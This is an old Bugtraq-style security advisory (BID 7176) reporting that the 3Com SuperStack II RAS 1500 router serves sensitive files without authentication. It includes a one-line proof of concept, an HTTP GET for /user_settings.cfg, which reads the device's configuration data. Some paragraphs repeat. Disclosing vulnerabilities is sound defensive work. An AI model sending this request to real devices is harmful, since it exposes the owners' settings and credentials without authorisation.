3Com SuperStack II RAS 1500 Unauthorized Access Vulnerability
BID:7176
Info
3Com SuperStack II RAS 1500 Unauthorized Access Vulnerability
| Bugtraq ID: | 7176 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2003 12:00AM |
| Updated: | Mar 24 2003 12:00AM |
| Credit: | The discovery of this vulnerability has been credited to Piotr Chytla <[email protected]>. |
| Vulnerable: |
3Com SuperStack II RAS 1500 2.5 .0 3Com SuperStack II RAS 1500 |
| Not Vulnerable: | |
Discussion
3Com SuperStack II RAS 1500 Unauthorized Access Vulnerability
A vulnerability has been reported in 3Com RAS 1500 router that may allow attackers to access sensitive data. Specifically, RAS 1500 devices fail to carry out authentication when requests are made for various files that may contain sensitive information.
A vulnerability has been reported in 3Com RAS 1500 router that may allow attackers to access sensitive data. Specifically, RAS 1500 devices fail to carry out authentication when requests are made for various files that may contain sensitive information.
Exploit / POC
3Com SuperStack II RAS 1500 Unauthorized Access Vulnerability
The following proof of concept has been supplied:
GET /user_settings.cfg HTTP/1.0
The following proof of concept has been supplied:
GET /user_settings.cfg HTTP/1.0
References
3Com SuperStack II RAS 1500 Unauthorized Access Vulnerability
References:
References:
- 3com RAS 1500 Remote vulnerabilities. (Piotr Chytla
) - re:3com RAS 1500 Remote vulnerabilities. (Jan Kachlik
)